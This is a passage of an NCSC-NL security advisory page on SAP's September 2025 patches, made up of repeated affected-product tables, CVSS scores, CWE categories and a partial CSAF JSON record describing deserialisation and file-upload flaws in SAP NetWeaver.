vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
8.1 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
6.5 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
8.8 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
6.1 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-1022
- Use of Web Link to Untrusted Target with window.opener Access
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
10.0 (Critical)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
9.1 (Critical)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
4.9 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
References
28 references
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "SAP heeft kwetsbaarheden verholpen in verschillende producten, waaronder in SAP NetWeaver, SAP NetWeaver Application Server Java en SAP Landscape Transformation.",
"title": "Feiten"
},
{
"category": "description",
"text": "De kwetsbaarheden bevinden zich onder andere in de RMI-P4 module en de SAP NetWeaver AS Java platform.\n\nDe kwetsbaarheid met kenmerk CVE-2025-42944 betreft een deserialisatieprobleem dat kan worden misbruikt door niet-geauthenticeerde aanvallers, wat kan leiden tot willekeurige OS-commando-executie. Dit bedreigt de vertrouwelijkheid, integriteit en beschikbaarheid van de applicatie.\n\nDe kwetsbaarheid met kenmerk CVE-2025-42922 stelt geauthenticeerde niet-administratieve gebruikers in staat om willekeurige bestanden te uploaden via de Deploy Web Service-functie. Dit kan ook leiden tot compromittering van systeemvertrouwelijkheid, integriteit en beschikbaarheid.",
"title": "Interpretaties"
},
{
"category": "description",
"text": "SAP heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "general",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "general",
"text": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"title": "CWE-94"
},
{
"category": "general",
"text": "Execution with Unnecessary Privileges",
"title": "CWE-250"
},
{
"category": "general",
"text": "Improper Authentication",
"title": "CWE-287"
},
{
"category": "general",
"text": "Missing Authentication for Critical Function",
"title": "CWE-306"
},
{
"category": "general",
"text": "Predictable from Observable State",
"title": "CWE-341"
},
{
"category": "general",
"text": "Cross-Site Request Forgery (CSRF)",
"title": "CWE-352"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "general",
"text": "Weak Password Requirements",
"title": "CWE-521"
},
{
"category": "general",
"text": "Insufficiently Protected Credentials",
"title": "CWE-522"
},
{
"category": "general",
"text": "Unchecked Input for Loop Condition",
"title": "CWE-606"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "Incorrect Authorization",
"title": "CWE-863"
},
{
"category": "general",
"text": "Use of Web Link to Untrusted Target with window.opener Access",
"title": "CWE-1022"
},
{
"category": "general",
"text": "Improper Validation of Specified Type of Input",
"title": "CWE-1287"
},
{
"category": "general",
"text": "Dependency on Vulnerable Third-Party Component",
"title": "CWE-1395"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/september-2025.html"
}
],
"title": "Kwetsbaarheden verholpen in SAP producten",
"tracking": {
"current_release_date": "2025-09-09T11:12:22.945466Z",
"generator": {
"date": "2025-08-04T16:30:00Z",
"engine": {
"name": "V.A.",
"version": "1.2"
}
},
"id": "NCSC-2025-0275",
"initial_release_date": "2025-09-09T11:12:22.945466Z",
"revision_history": [
{
"date": "2025-09-09T11:12:22.945466Z",
"number": "1.0.0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-1"
}
}
],
"category": "product_name",
"name": "Business Planning and Consolidation"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-2"
}
}
],
"category": "product_name",
"name": "NetWeaver ABAP Platform"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-3"
}
}
],
"category": "product_name",
"name": "NetWeaver AS Java"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-4"
}
}
],
"category": "product_name",
"name": "Netweaver"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-5"
}
}
],
"category": "product_name",
"name": "SAP Business One (SLD)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-6"
}
}
],
"category": "product_name",
"name": "SAP Fiori (Launchpad)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-7"
}
}
],
"category": "product_name",
"name": "SAP Fiori App (F4044 Manage Work Center Groups)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-8"
}
}
],
"category": "product_name",
"name": "SAP HCM (Approve Timesheets Fiori 2.0 application)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-9"
}
}
],
"category": "product_name",
"name": "SAP HCM (My Timesheet Fiori 2.0 application)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-10"
}
}
],
"category": "product_name",
"name": "SAP Landscape Transformation Replication Server"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-11"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver (Service Data Download)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-12"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver AS Java (Adobe Document Service)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-13"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver AS Java (Deploy Web Service)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-14"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver AS Java (IIOP Service)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-15"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver Application Server Java"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-16"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver Application Server for ABAP"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-17"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver Application Server for ABAP (Background Processing)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-18"
}
}
],
"category": "product_name",
"name": "SAP NetWeaver and ABAP Platform (Service Data Collection)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-19"
}
}
],
"category": "product_name",
"name": "SAP Netweaver (RMI-P4)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-20"
}
}
],
"category": "product_name",
"name": "SAP S/4HANA (Private Cloud or On-Premise)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-21"
}
}
],
"category": "product_name",
"name": "Supplier Relationship Management"
}
],
"category": "vendor",
"name": "SAP"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-5072",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5072 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2023/cve-2023-5072.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2023-5072"
},
{
"cve": "CVE-2023-27500",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
